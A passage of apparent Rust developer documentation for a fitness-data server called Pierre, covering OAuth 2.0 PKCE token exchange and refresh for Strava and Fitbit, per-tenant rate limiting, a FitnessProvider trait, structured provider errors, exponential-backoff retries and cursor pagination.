("redirect_uri", self.config.redirect_uri.as_str()),
];
if self.config.use_pkce {
params.push(("code_verifier", &pkce.code_verifier));
}
let response: TokenResponse = self
.client
.post(&self.config.token_url)
.form(¶ms)
.send()
.await?
.json()
.await?;
Ok(Self::token_from_response(response))
}
}
Token exchange flow:
- Build form params: Client credentials, auth code, grant type, redirect URI
- Add PKCE verifier: Include `code_verifier` if PKCE is enabled
- POST to token endpoint: Send form-encoded request
- Parse response: Extract access token, refresh token, expiration
- Return OAuth2Token: Structured token with expiration tracking
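Steps 1-2 of the flow above can be sketched in isolation: assemble the form parameters, conditionally appending the PKCE verifier. The function and its values are illustrative, not the Pierre API:

```rust
// Illustrative sketch of building token-exchange form parameters with an
// optional PKCE verifier, mirroring exchange_code_with_pkce above.
fn build_token_params<'a>(
    client_id: &'a str,
    client_secret: &'a str,
    code: &'a str,
    redirect_uri: &'a str,
    code_verifier: &'a str,
    use_pkce: bool,
) -> Vec<(&'static str, &'a str)> {
    let mut params = vec![
        ("client_id", client_id),
        ("client_secret", client_secret),
        ("code", code),
        ("grant_type", "authorization_code"),
        ("redirect_uri", redirect_uri),
    ];
    if use_pkce {
        // Only sent when the client was configured for PKCE.
        params.push(("code_verifier", code_verifier));
    }
    params
}

fn main() {
    let with = build_token_params("id", "secret", "c0de", "http://localhost/cb", "ver", true);
    assert!(with.iter().any(|(k, _)| *k == "code_verifier"));

    let without = build_token_params("id", "secret", "c0de", "http://localhost/cb", "ver", false);
    assert!(!without.iter().any(|(k, _)| *k == "code_verifier"));
}
```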
Token Refresh
The client refreshes expired tokens automatically:
Source: src/oauth2_client/client.rs:239-262 (conceptual)
#![allow(unused)]
fn main() {
/// Refresh an expired access token
///
/// # Errors
///
/// Returns an error if the token refresh request fails or response is invalid
pub async fn refresh_token(&self, refresh_token: &str) -> Result<OAuth2Token> {
let params = [
("client_id", self.config.client_id.as_str()),
("client_secret", self.config.client_secret.as_str()),
("refresh_token", refresh_token),
("grant_type", "refresh_token"),
];
let response: TokenResponse = self
.client
.post(&self.config.token_url)
.form(¶ms)
.send()
.await?
.json()
.await?;
Ok(Self::token_from_response(response))
}
}
Refresh flow:
- Use refresh token: Include `refresh_token` from the previous response
- Grant type: `refresh_token` instead of `authorization_code`
- New access token: Provider issues a fresh access token
- Update storage: Replace old token in database
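Combined with `will_expire_soon()`, the refresh flow suggests a simple decision policy. A hypothetical sketch (the enum and function are not Pierre code) of what a caller might do before each API request:

```rust
use std::time::{Duration, SystemTime};

// Hypothetical refresh policy: refresh proactively inside the 5-minute
// window when a refresh token exists, else fall back to re-authorization.
#[derive(Debug, PartialEq)]
enum TokenAction {
    UseAsIs,
    Refresh,
    Reauthorize,
}

fn next_action(expires_at: SystemTime, has_refresh_token: bool) -> TokenAction {
    let soon = SystemTime::now() + Duration::from_secs(5 * 60);
    if expires_at > soon {
        TokenAction::UseAsIs
    } else if has_refresh_token {
        TokenAction::Refresh
    } else {
        TokenAction::Reauthorize
    }
}

fn main() {
    let now = SystemTime::now();
    assert_eq!(next_action(now + Duration::from_secs(3600), true), TokenAction::UseAsIs);
    assert_eq!(next_action(now + Duration::from_secs(60), true), TokenAction::Refresh);
    assert_eq!(next_action(now + Duration::from_secs(60), false), TokenAction::Reauthorize);
}
```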
Provider-Specific Clients
Pierre includes specialized clients for Strava and Fitbit:
Strava token exchange (src/oauth2_client/client.rs:372-395):
#![allow(unused)]
fn main() {
/// Exchange Strava authorization code with `PKCE` support
pub async fn exchange_strava_code_with_pkce(
client_id: &str,
client_secret: &str,
code: &str,
redirect_uri: &str,
pkce: &PkceParams,
) -> Result<(OAuth2Token, serde_json::Value)> {
let params = [
("client_id", client_id),
("client_secret", client_secret),
("code", code),
("grant_type", "authorization_code"),
("code_verifier", &pkce.code_verifier),
];
let client = oauth_client();
let response: TokenResponse = client
.post("https://www.strava.com/oauth/token")
.form(¶ms)
.send()
.await?
.json()
.await?;
// Strava returns athlete data with token response
let token = OAuth2Client::token_from_response(response.clone());
let athlete = response.athlete.unwrap_or_default();
Ok((token, athlete))
}
}
Strava specifics:
- Athlete data: Strava returns athlete profile with token response
- Hardcoded endpoint: `https://www.strava.com/oauth/token`
- PKCE support: Strava supports the `code_verifier` parameter
Fitbit token exchange (src/oauth2_client/client.rs:522-545):
#![allow(unused)]
fn main() {
/// Exchange Fitbit authorization code with `PKCE` support
pub async fn exchange_fitbit_code_with_pkce(
client_id: &str,
client_secret: &str,
code: &str,
redirect_uri: &str,
pkce: &PkceParams,
) -> Result<(OAuth2Token, serde_json::Value)> {
let params = [
("client_id", client_id),
("client_secret", client_secret),
("code", code),
("grant_type", "authorization_code"),
("redirect_uri", redirect_uri),
("code_verifier", &pkce.code_verifier),
];
let client = oauth_client();
let response: TokenResponse = client
.post("https://api.fitbit.com/oauth2/token")
.form(¶ms)
.send()
.await?
.json()
.await?;
let token = OAuth2Client::token_from_response(response);
Ok((token, serde_json::json!({})))
}
}
Fitbit specifics:
- Redirect URI required: Fitbit validates redirect_uri in token request
- No user data: Fitbit doesn’t return user profile with token response
- Hardcoded endpoint: `https://api.fitbit.com/oauth2/token`
Tenant-Aware OAuth Client
Pierre wraps the generic OAuth client with tenant-specific rate limiting:
Source: src/tenant/oauth_client.rs:36-49
#![allow(unused)]
fn main() {
/// Tenant-aware OAuth client with credential isolation and rate limiting
pub struct TenantOAuthClient {
/// Shared OAuth manager instance for handling tenant-specific OAuth operations
pub oauth_manager: Arc<Mutex<TenantOAuthManager>>,
}
impl TenantOAuthClient {
/// Create new tenant OAuth client with provided manager
#[must_use]
pub fn new(oauth_manager: TenantOAuthManager) -> Self {
Self {
oauth_manager: Arc::new(Mutex::new(oauth_manager)),
}
}
}
}
Get OAuth client with rate limiting:
Source: src/tenant/oauth_client.rs:59-93
#![allow(unused)]
fn main() {
/// Get `OAuth2Client` configured for specific tenant and provider
///
/// # Errors
///
/// Returns an error if:
/// - Tenant exceeds daily rate limit for the provider
/// - No OAuth credentials configured for tenant and provider
/// - OAuth configuration creation fails
pub async fn get_oauth_client(
&self,
tenant_context: &TenantContext,
provider: &str,
database: &Database,
) -> Result<OAuth2Client> {
// Check rate limit first
let manager = self.oauth_manager.lock().await;
let (current_usage, daily_limit) =
manager.check_rate_limit(tenant_context.tenant_id, provider)?;
if current_usage >= daily_limit {
return Err(AppError::invalid_input(format!(
"Tenant {} has exceeded daily rate limit for provider {}: {}/{}",
tenant_context.tenant_id, provider, current_usage, daily_limit
))
.into());
}
// Get tenant credentials
let credentials = manager
.get_credentials(tenant_context.tenant_id, provider, database)
.await?;
drop(manager);
// Build OAuth2Config from tenant credentials
let oauth_config = Self::build_oauth_config(&credentials, provider)?;
Ok(OAuth2Client::new(oauth_config))
}
}
Tenant isolation:
- Rate limit check: Enforce daily API call limits per tenant
- Credential lookup: Tenant-specific OAuth app credentials
- OAuth client creation: Generic client with tenant configuration
- Usage tracking: Increment counter after successful operations
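The rate-limit check in step 1 can be sketched with a plain in-memory counter keyed by (tenant, provider). The types and names below are illustrative, not the real `TenantOAuthManager` internals:

```rust
use std::collections::HashMap;

// Illustrative per-tenant rate limiter: usage counted per (tenant, provider)
// pair, rejected once the daily limit is reached.
struct RateLimiter {
    usage: HashMap<(String, String), u32>,
    daily_limit: u32,
}

impl RateLimiter {
    fn try_acquire(&mut self, tenant: &str, provider: &str) -> Result<(), String> {
        let count = self
            .usage
            .entry((tenant.to_owned(), provider.to_owned()))
            .or_insert(0);
        if *count >= self.daily_limit {
            return Err(format!(
                "Tenant {tenant} exceeded daily limit for {provider}: {count}/{}",
                self.daily_limit
            ));
        }
        *count += 1;
        Ok(())
    }
}

fn main() {
    let mut limiter = RateLimiter { usage: HashMap::new(), daily_limit: 2 };
    assert!(limiter.try_acquire("tenant-a", "strava").is_ok());
    assert!(limiter.try_acquire("tenant-a", "strava").is_ok());
    assert!(limiter.try_acquire("tenant-a", "strava").is_err()); // limit hit
    assert!(limiter.try_acquire("tenant-b", "strava").is_ok()); // isolated per tenant
}
```

Note that counters are isolated per tenant: tenant-b is unaffected by tenant-a exhausting its quota.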
OAuth Flow Integration
Providers use the tenant-aware OAuth client for authentication:
Strava provider integration (src/providers/strava.rs:220-237):
#![allow(unused)]
fn main() {
pub async fn exchange_code_with_pkce(
&mut self,
code: &str,
redirect_uri: &str,
pkce: &crate::oauth2_client::PkceParams,
) -> Result<(String, String)> {
let credentials = self.oauth_manager.get_credentials(...).await?;
let (token, athlete) = crate::oauth2_client::strava::exchange_strava_code_with_pkce(
&credentials.client_id,
&credentials.client_secret,
code,
redirect_uri,
pkce,
)
.await?;
// Store token in database
self.store_token(&token).await?;
Ok((token.access_token, athlete["id"].as_str().unwrap_or_default().to_owned()))
}
}
Integration steps:
- Get credentials: Tenant-specific OAuth app credentials from manager
- Exchange code: Call provider-specific token exchange function
- Store token: Save access token and refresh token to database
- Return result: Access token and user ID for subsequent API calls
Key Takeaways
- Generic OAuth client: A single `OAuth2Client` implementation works with all providers.
- PKCE mandatory: All OAuth flows use SHA-256 PKCE for security.
- Provider specifics: Strava and Fitbit have different response formats and endpoint URLs.
- Token expiration: `will_expire_soon()` enables proactive token refresh (5-minute buffer).
- Tenant isolation: Each tenant has separate OAuth credentials and rate limits.
- Rate limiting: Daily API call limits prevent tenant abuse of provider APIs.
- Refresh tokens: Long-lived refresh tokens avoid repeated user authorization.
- Base64url encoding: URL-safe base64 without padding matches the OAuth 2.0 spec.
- Option::is_some_and: Idiomatic Rust for conditional checks on `Option` values.
- Credential fallback: Tenant-specific credentials with server-level fallback for flexibility.
Next Chapter: Chapter 17: Provider Data Models & Rate Limiting - Learn how Pierre abstracts fitness provider APIs with unified interfaces and handles rate limiting across multiple providers.
Chapter 17: Provider Data Models & Rate Limiting
This chapter explores how Pierre abstracts fitness provider APIs through unified interfaces and handles rate limiting across multiple providers. You’ll learn about trait-based provider abstraction, provider-agnostic data models, retry logic, and tenant-aware provider wrappers.
Provider Abstraction Architecture
Pierre uses a trait-based approach to abstract fitness provider differences:
┌──────────────────────────────────────────────────────────┐
│ FitnessProvider Trait │
│ (Unified interface for all fitness data providers) │
└──────────────────────────────────────────────────────────┘
│
┌───────────────────┼───────────────────┐
│ │ │
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Strava │ │ Fitbit │ │ Garmin │
│ Provider │ │ Provider │ │ Provider │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Strava API │ │ Fitbit API │ │ Garmin API │
│ (REST/JSON) │ │ (REST/JSON) │ │ (REST/JSON) │
└──────────────┘ └──────────────┘ └──────────────┘
Key benefit: Pierre tools call FitnessProvider methods without knowing which provider implementation they’re using.
FitnessProvider Trait
The trait defines a uniform interface for all fitness providers:
Source: src/providers/core.rs:52-171
#![allow(unused)]
fn main() {
/// Core fitness data provider trait - single interface for all providers
#[async_trait]
pub trait FitnessProvider: Send + Sync {
/// Get provider name (e.g., "strava", "fitbit")
fn name(&self) -> &'static str;
/// Get provider configuration
fn config(&self) -> &ProviderConfig;
/// Set `OAuth2` credentials for this provider
async fn set_credentials(&self, credentials: OAuth2Credentials) -> Result<()>;
/// Check if provider has valid authentication
async fn is_authenticated(&self) -> bool;
/// Refresh access token if needed
async fn refresh_token_if_needed(&self) -> Result<()>;
/// Get user's athlete profile
async fn get_athlete(&self) -> Result<Athlete>;
/// Get user's activities with offset-based pagination (legacy)
async fn get_activities(
&self,
limit: Option<usize>,
offset: Option<usize>,
) -> Result<Vec<Activity>>;
/// Get user's activities with cursor-based pagination (recommended)
///
/// This method provides efficient, consistent pagination using opaque cursors.
/// Cursors prevent duplicates and missing items when data changes during pagination.
async fn get_activities_cursor(
&self,
params: &PaginationParams,
) -> Result<CursorPage<Activity>>;
/// Get specific activity by ID
async fn get_activity(&self, id: &str) -> Result<Activity>;
/// Get user's aggregate statistics
async fn get_stats(&self) -> Result<Stats>;
/// Get user's personal records
async fn get_personal_records(&self) -> Result<Vec<PersonalRecord>>;
/// Get sleep sessions for a date range
///
/// Returns sleep data from providers that support sleep tracking (Fitbit, Garmin).
/// Providers without sleep data support return `UnsupportedFeature` error.
async fn get_sleep_sessions(
&self,
start_date: DateTime<Utc>,
end_date: DateTime<Utc>,
) -> Result<Vec<SleepSession>, ProviderError> {
let date_range = format!(
"{} to {}",
start_date.format("%Y-%m-%d"),
end_date.format("%Y-%m-%d")
);
Err(ProviderError::UnsupportedFeature {
provider: self.name().to_owned(),
feature: format!("sleep_sessions (requested: {date_range})"),
})
}
/// Revoke access tokens (disconnect)
async fn disconnect(&self) -> Result<()>;
}
}
Trait design:
- #[async_trait]: Required for async methods in traits (trait desugaring for async)
- Send + Sync: Required for sharing across threads in async Rust
- Default implementations: Optional methods like `get_sleep_sessions` have defaults that return `UnsupportedFeature`
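The default-implementation pattern is easy to see in a synchronous sketch: providers get `sleep_sessions` "for free" as an unsupported-feature error unless they override it. (The real trait is async and returns `ProviderError`; this strips both away for brevity.)

```rust
// Sync sketch of default trait methods for optional provider features.
trait Provider {
    fn name(&self) -> &'static str;

    // Default: providers that don't override this report the feature
    // as unsupported, mirroring get_sleep_sessions above.
    fn sleep_sessions(&self) -> Result<Vec<String>, String> {
        Err(format!("{} does not support sleep_sessions", self.name()))
    }
}

struct Strava;
impl Provider for Strava {
    fn name(&self) -> &'static str { "strava" }
    // No override: inherits the default "unsupported" implementation.
}

struct Fitbit;
impl Provider for Fitbit {
    fn name(&self) -> &'static str { "fitbit" }
    // Fitbit supports sleep tracking, so it overrides the default.
    fn sleep_sessions(&self) -> Result<Vec<String>, String> {
        Ok(vec!["2024-01-01 sleep session".to_owned()])
    }
}

fn main() {
    assert!(Strava.sleep_sessions().is_err());
    assert!(Fitbit.sleep_sessions().is_ok());
}
```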
Rust Idioms: Async Trait
Source: src/providers/core.rs:53
#![allow(unused)]
fn main() {
#[async_trait]
pub trait FitnessProvider: Send + Sync {
async fn get_athlete(&self) -> Result<Athlete>;
// ... other async methods
}
}
Why async_trait:
- Trait async limitation: Native `async fn` in traits (stabilized in Rust 1.75) still doesn't work with `dyn Trait` objects, which Pierre needs for `Box<dyn FitnessProvider>`
- Macro expansion: The `#[async_trait]` macro transforms async methods to return `Pin<Box<dyn Future>>`
- Send + Sync: Required for async traits to ensure thread safety across await points
Expanded version (conceptual):
#![allow(unused)]
fn main() {
trait FitnessProvider: Send + Sync {
fn get_athlete(&self) -> Pin<Box<dyn Future<Output = Result<Athlete>> + Send + '_>>;
}
}
Provider-Agnostic Data Models
Pierre defines unified data models that work across all providers:
Activity model (src/models.rs:246-350 - conceptual):
#![allow(unused)]
fn main() {
/// Represents a single fitness activity from any provider
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Activity {
/// Unique identifier (provider-specific)
pub id: String,
/// Activity name/title
pub name: String,
/// Sport type (run, ride, swim, etc.)
pub sport_type: SportType,
/// Activity distance in meters
pub distance: Option<f64>,
/// Total duration in seconds
pub duration: Option<u64>,
/// Moving time in seconds (excludes rest/stops)
pub moving_time: Option<u64>,
/// Total elevation gain in meters
pub total_elevation_gain: Option<f64>,
/// Activity start time (UTC)
pub start_date: DateTime<Utc>,
/// Average speed in m/s
pub average_speed: Option<f32>,
/// Average heart rate in BPM
pub average_heartrate: Option<u32>,
/// Maximum heart rate in BPM
pub max_heartrate: Option<u32>,
/// Average power in watts (cycling)
pub average_watts: Option<u32>,
/// Total energy in kilojoules
pub kilojoules: Option<f32>,
/// Calories burned
pub calories: Option<u32>,
/// Whether activity used a trainer/treadmill
pub trainer: Option<bool>,
/// GPS route polyline (encoded)
pub map: Option<ActivityMap>,
// ... 30+ more optional fields
}
}
Design principles:
- Provider-agnostic: Fields common across all providers (id, name, distance, etc.)
- Optional fields: Use `Option<T>` for provider-specific or missing data
- Normalized units: Standardize on meters, seconds, BPM (not provider-specific units)
- Extensible: New providers can omit fields they don’t support
Athlete model (src/models.rs:400-450 - conceptual):
#![allow(unused)]
fn main() {
/// Athlete profile information
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Athlete {
pub id: String,
pub username: Option<String>,
pub firstname: Option<String>,
pub lastname: Option<String>,
pub city: Option<String>,
pub state: Option<String>,
pub country: Option<String>,
pub sex: Option<String>,
pub weight: Option<f32>,
pub profile_medium: Option<String>,
pub profile: Option<String>,
pub ftp: Option<u32>, // Functional Threshold Power (cycling)
// ... provider-specific fields
}
}
Provider Error Types
Pierre defines structured errors with retry information:
Source: src/providers/errors.rs:10-101
#![allow(unused)]
fn main() {
/// Provider operation errors with structured context
#[derive(Error, Debug)]
pub enum ProviderError {
/// Provider API is unavailable or returning errors
#[error("Provider {provider} API error: {status_code} - {message}")]
ApiError {
/// Name of the fitness provider (e.g., "strava", "garmin")
provider: String,
/// HTTP status code from the provider
status_code: u16,
/// Error message from the provider
message: String,
/// Whether this error can be retried
retryable: bool,
},
/// Rate limit exceeded with retry information
#[error("Rate limit exceeded for {provider}: retry after {retry_after_secs} seconds")]
RateLimitExceeded {
/// Name of the fitness provider
provider: String,
/// Seconds to wait before retrying
retry_after_secs: u64,
/// Type of rate limit hit (e.g., "15-minute", "daily")
limit_type: String,
},
/// Authentication failed or token expired
#[error("Authentication failed for {provider}: {reason}")]
AuthenticationFailed {
/// Name of the fitness provider
provider: String,
/// Reason for authentication failure
reason: String,
},
/// Resource not found
#[error("{resource_type} '{resource_id}' not found in {provider}")]
NotFound {
provider: String,
resource_type: String,
resource_id: String,
},
/// Feature not supported by provider
#[error("Provider {provider} does not support {feature}")]
UnsupportedFeature {
provider: String,
feature: String,
},
// ... more error variants
}
}
Structured errors:
- thiserror: Derives the `Error` trait implementation from `#[error]` attributes
- Named fields: Structured data (provider, status_code, retry_after_secs)
- Display message: The `#[error(...)]` attribute generates user-friendly `Display` messages
Retry logic:
Source: src/providers/errors.rs:104-130
#![allow(unused)]
fn main() {
impl ProviderError {
/// Check if error is retryable
#[must_use]
pub const fn is_retryable(&self) -> bool {
match self {
Self::ApiError { retryable, .. } => *retryable,
Self::RateLimitExceeded { .. } | Self::NetworkError(_) => true,
Self::AuthenticationFailed { .. }
| Self::TokenRefreshFailed { .. }
| Self::NotFound { .. }
| Self::InvalidData { .. }
| Self::ConfigurationError { .. }
| Self::UnsupportedFeature { .. }
| Self::Other(_) => false,
}
}
/// Get retry delay in seconds if applicable
#[must_use]
pub const fn retry_after_secs(&self) -> Option<u64> {
match self {
Self::RateLimitExceeded {
retry_after_secs, ..
} => Some(*retry_after_secs),
_ => None,
}
}
}
}
Retryable errors: Rate limits and network errors can be retried; authentication failures and not-found errors cannot.
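A caller can branch on this classification to decide what to do next. The sketch below uses a trimmed stand-in for `ProviderError` (only three variants) so it stays self-contained:

```rust
// Trimmed stand-in for ProviderError, to show caller-side retry branching.
enum ProviderError {
    ApiError { retryable: bool },
    RateLimitExceeded { retry_after_secs: u64 },
    AuthenticationFailed,
}

impl ProviderError {
    fn is_retryable(&self) -> bool {
        match self {
            Self::ApiError { retryable } => *retryable,
            Self::RateLimitExceeded { .. } => true,
            Self::AuthenticationFailed => false,
        }
    }

    fn retry_after_secs(&self) -> Option<u64> {
        match self {
            Self::RateLimitExceeded { retry_after_secs } => Some(*retry_after_secs),
            _ => None,
        }
    }
}

// Caller-side policy: retry with a delay, retry with backoff, or give up.
fn describe(err: &ProviderError) -> String {
    if err.is_retryable() {
        match err.retry_after_secs() {
            Some(secs) => format!("retry after {secs}s"),
            None => "retry with backoff".to_owned(),
        }
    } else {
        "do not retry".to_owned()
    }
}

fn main() {
    let rate_limited = ProviderError::RateLimitExceeded { retry_after_secs: 900 };
    assert_eq!(describe(&rate_limited), "retry after 900s");
    assert_eq!(describe(&ProviderError::AuthenticationFailed), "do not retry");
    assert_eq!(describe(&ProviderError::ApiError { retryable: true }), "retry with backoff");
}
```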
Retry Logic with Exponential Backoff
Pierre implements automatic retry with exponential backoff for rate limits:
Source: src/providers/utils.rs:17-39
#![allow(unused)]
fn main() {
/// Configuration for retry behavior
#[derive(Debug, Clone)]
pub struct RetryConfig {
/// Maximum number of retry attempts
pub max_retries: u32,
/// Initial backoff delay in milliseconds
pub initial_backoff_ms: u64,
/// HTTP status codes that should trigger retries
pub retryable_status_codes: Vec<StatusCode>,
/// Estimated block duration for user-facing error messages (seconds)
pub estimated_block_duration_secs: u64,
}
impl Default for RetryConfig {
fn default() -> Self {
Self {
max_retries: 3,
initial_backoff_ms: 1000,
retryable_status_codes: vec![StatusCode::TOO_MANY_REQUESTS],
estimated_block_duration_secs: 3600, // 1 hour
}
}
}
}
Retry implementation:
Source: src/providers/utils.rs:97-175
#![allow(unused)]
fn main() {
/// Make an authenticated HTTP GET request with retry logic
pub async fn api_request_with_retry<T>(
client: &Client,
url: &str,
access_token: &str,
provider_name: &str,
retry_config: &RetryConfig,
) -> Result<T>
where
T: for<'de> Deserialize<'de>,
{
tracing::info!("Starting {provider_name} API request to: {url}");
let mut attempt = 0;
loop {
let response = client
.get(url)
.header("Authorization", format!("Bearer {access_token}"))
.send()
.await
.with_context(|| format!("Failed to send request to {provider_name} API"))?;
let status = response.status();
tracing::info!("Received HTTP response with status: {status}");
if retry_config.retryable_status_codes.contains(&status) {
attempt += 1;
if attempt >= retry_config.max_retries {
let max_retries = retry_config.max_retries;
warn!(
"{provider_name} API rate limit exceeded - max retries ({max_retries}) reached"
);
let minutes = retry_config.estimated_block_duration_secs / 60;
let status_code = status.as_u16();
return Err(ProviderError::RateLimitExceeded {
provider: provider_name.to_owned(),
retry_after_secs: retry_config.estimated_block_duration_secs,
limit_type: format!(
"API rate limit ({status_code}) - max retries reached - wait ~{minutes} minutes"
),
}.into());
}
let backoff_ms = retry_config.initial_backoff_ms * 2_u64.pow(attempt - 1);
let max_retries = retry_config.max_retries;
let status_code = status.as_u16();
warn!(
"{provider_name} API rate limit hit ({status_code}) - retry {attempt}/{max_retries} after {backoff_ms}ms backoff"
);
tokio::time::sleep(Duration::from_millis(backoff_ms)).await;
continue;
}
if !status.is_success() {
let text = response.text().await.unwrap_or_default();
return Err(ProviderError::ApiError {
provider: provider_name.to_owned(),
status_code: status.as_u16(),
message: format!("{provider_name} API request failed with status {status}: {text}"),
retryable: false,
}
.into());
}
return response
.json()
.await
.with_context(|| format!("Failed to parse {provider_name} API response"));
}
}
}
Exponential backoff:
Attempt 1: initial_backoff_ms * 2^0 = 1000ms (1 second)
Attempt 2: initial_backoff_ms * 2^1 = 2000ms (2 seconds)
Attempt 3: initial_backoff_ms * 2^2 = 4000ms (4 seconds)
Why exponential backoff: Prevents thundering herd problem where all clients retry simultaneously.
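The schedule above is just the backoff expression from `api_request_with_retry`, extracted into a function (`attempt` is 1-based, matching the counter after `attempt += 1`):

```rust
// Backoff computation from the retry loop above: doubles on each attempt.
fn backoff_ms(initial_backoff_ms: u64, attempt: u32) -> u64 {
    initial_backoff_ms * 2_u64.pow(attempt - 1)
}

fn main() {
    assert_eq!(backoff_ms(1000, 1), 1000); // 1 second
    assert_eq!(backoff_ms(1000, 2), 2000); // 2 seconds
    assert_eq!(backoff_ms(1000, 3), 4000); // 4 seconds
}
```

Production systems often also add random jitter to each delay so clients that failed at the same moment don't retry in lockstep; the Pierre code shown above uses the pure doubling schedule.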
Rust Idioms: HRTB for Generic Deserialize
Source: src/providers/utils.rs:104-105
#![allow(unused)]
fn main() {
where
T: for<'de> Deserialize<'de>,
}
HRTB (Higher-Ranked Trait Bound):
- `for<'de>`: Type `T` must implement `Deserialize` for any lifetime `'de`
- Needed for serde: `Deserialize` has a lifetime parameter for borrowed data
- Generic deserialization: Allows the function to return any deserializable type
Without HRTB (doesn’t compile):
#![allow(unused)]
fn main() {
where
T: Deserialize<'static>, // Too restrictive - only works for 'static lifetime
}
Type Conversion Utilities
Providers return float values that need safe conversion to integers:
Source: src/providers/utils.rs:42-86
#![allow(unused)]
fn main() {
/// Type conversion utilities for safe float-to-integer conversions
pub mod conversions {
use num_traits::ToPrimitive;
/// Safely convert f64 to u64, clamping to valid range
/// Used for duration values from APIs that return floats
#[must_use]
pub fn f64_to_u64(value: f64) -> u64 {
if !value.is_finite() {
return 0;
}
let t = value.trunc();
if t.is_sign_negative() {
return 0;
}
t.to_u64().map_or(u64::MAX, |v| v)
}
/// Safely convert f32 to u32, clamping to valid range
/// Used for metrics like heart rate, power, cadence
#[must_use]
pub fn f32_to_u32(value: f32) -> u32 {
if !value.is_finite() {
return 0;
}
let t = value.trunc();
if t.is_sign_negative() {
return 0;
}
t.to_u32().map_or(u32::MAX, |v| v)
}
/// Safely convert f64 to u32, clamping to valid range
/// Used for calorie values and other metrics
#[must_use]
pub fn f64_to_u32(value: f64) -> u32 {
if !value.is_finite() {
return 0;
}
let t = value.trunc();
if t.is_sign_negative() {
return 0;
}
t.to_u32().map_or(u32::MAX, |v| v)
}
}
}
Safety checks:
- is_finite(): Reject NaN and infinity
- is_sign_negative(): Reject negative values (durations/HR/power can’t be negative)
- trunc(): Remove fractional part before conversion
- map_or(): Clamp to max value if conversion overflows
Usage example:
#![allow(unused)]
fn main() {
let duration_secs: f64 = activity_json["duration"].as_f64().unwrap_or(0.0);
let duration: u64 = conversions::f64_to_u64(duration_secs);
}
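For comparison, Rust's built-in float-to-int `as` casts have had saturating semantics since Rust 1.45, covering most of the same edge cases. One behavioral difference: the helpers above map infinity to 0 (via `is_finite()`), while `as` saturates it to the maximum value:

```rust
// Saturating `as` cast behavior (guaranteed since Rust 1.45), contrasted
// with the f64_to_u64 helper above.
fn main() {
    assert_eq!(f64::NAN as u64, 0);             // NaN maps to 0, like the helper
    assert_eq!((-5.0_f64) as u64, 0);           // negative clamps to 0, like the helper
    assert_eq!(12.9_f64 as u64, 12);            // fraction truncated, like trunc()
    assert_eq!(f64::INFINITY as u64, u64::MAX); // differs: the helper returns 0 here
}
```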
Tenant-Aware Provider Wrapper
Pierre wraps providers with tenant context for isolation:
Source: src/providers/core.rs:182-211
#![allow(unused)]
fn main() {
/// Tenant-aware provider wrapper that handles multi-tenancy
pub struct TenantProvider {
inner: Box<dyn FitnessProvider>,
tenant_id: Uuid,
user_id: Uuid,
}
impl TenantProvider {
/// Create a new tenant-aware provider
#[must_use]
pub fn new(inner: Box<dyn FitnessProvider>, tenant_id: Uuid, user_id: Uuid) -> Self {
Self {
inner,
tenant_id,
user_id,
}
}
/// Get tenant ID
#[must_use]
pub const fn tenant_id(&self) -> Uuid {
self.tenant_id
}
/// Get user ID
#[must_use]
pub const fn user_id(&self) -> Uuid {
self.user_id
}
}
}
Delegation pattern:
Source: src/providers/core.rs:213-276
#![allow(unused)]
fn main() {
#[async_trait]
impl FitnessProvider for TenantProvider {
fn name(&self) -> &'static str {
self.inner.name()
}
async fn set_credentials(&self, credentials: OAuth2Credentials) -> Result<()> {
// Add tenant-specific logging/metrics here
tracing::info!(
"Setting credentials for provider {} in tenant {} for user {}",
self.name(),
self.tenant_id,
self.user_id
);
self.inner.set_credentials(credentials).await
}
async fn get_athlete(&self) -> Result<Athlete> {
self.inner.get_athlete().await
}
// ... delegate all other methods to inner
}
}
Wrapper benefits:
- Logging: Tenant/user context in all log messages
- Metrics: Track usage per tenant/user
- Isolation: Prevent cross-tenant data leaks
- Transparent: Tools don’t know they’re using wrapped provider
Cursor-Based Pagination
Pierre supports cursor-based pagination for efficient data access:
Conceptual implementation:
#![allow(unused)]
fn main() {
pub struct PaginationParams {
pub limit: Option<usize>,
pub cursor: Option<String>,
}
pub struct CursorPage<T> {
pub items: Vec<T>,
pub next_cursor: Option<String>,
pub has_more: bool,
}
}
Cursor vs offset pagination:
| Offset-based | Cursor-based |
|---|---|
| `?limit=10&offset=20` | `?limit=10&cursor=abc123` |
| Can miss items if data changes | Consistent even if data changes |
| Simple to implement | Requires opaque cursor generation |
| Slow for large offsets | Fast for any cursor position |
Why cursors:
- Consistency: Prevent duplicate/missing items when data inserted during pagination
- Performance: Database can seek to cursor position efficiently
- Provider support: Strava, Fitbit, Garmin all support cursor pagination
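An in-memory sketch of driving cursor pagination to exhaustion, mirroring the `PaginationParams`/`CursorPage` shapes above (the cursor here is just a stringified index; real cursors are opaque provider tokens, and `has_more` is folded into `next_cursor` for brevity):

```rust
// Minimal cursor page: items plus an opaque cursor for the next page.
struct CursorPage<T> {
    items: Vec<T>,
    next_cursor: Option<String>,
}

// Toy data source: the "cursor" encodes the next start index.
fn fetch_page(data: &[i32], cursor: Option<&str>, limit: usize) -> CursorPage<i32> {
    let start: usize = cursor.map_or(0, |c| c.parse().unwrap_or(0));
    let end = (start + limit).min(data.len());
    CursorPage {
        items: data[start..end].to_vec(),
        next_cursor: (end < data.len()).then(|| end.to_string()),
    }
}

fn main() {
    let data: Vec<i32> = (1..=7).collect();
    let mut cursor: Option<String> = None;
    let mut all = Vec::new();
    // Standard pagination loop: follow next_cursor until it is None.
    loop {
        let page = fetch_page(&data, cursor.as_deref(), 3);
        all.extend(page.items);
        match page.next_cursor {
            Some(c) => cursor = Some(c),
            None => break,
        }
    }
    assert_eq!(all, data); // every item seen exactly once, in order
}
```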
Key Takeaways
- Trait-based abstraction: The `FitnessProvider` trait unifies all provider implementations.
- async_trait: Required for async methods on `dyn` trait objects (Rust limitation workaround).
- Send + Sync: Required for sharing trait objects across async tasks/threads.
- Provider-agnostic models: Unified `Activity`, `Athlete`, and `Stats` types work across all providers.
- Structured errors: `ProviderError` with named fields and retry information.
- Exponential backoff: `initial_backoff_ms * 2^(attempt - 1)` prevents the thundering herd problem.
- Type conversion: Safe float-to-integer conversion handles NaN, infinity, and negative values.
- HRTB: `for<'de> Deserialize<'de>` allows generic deserialization with any lifetime.
- Tenant wrapper: `TenantProvider` adds tenant/user context without changing the trait interface.
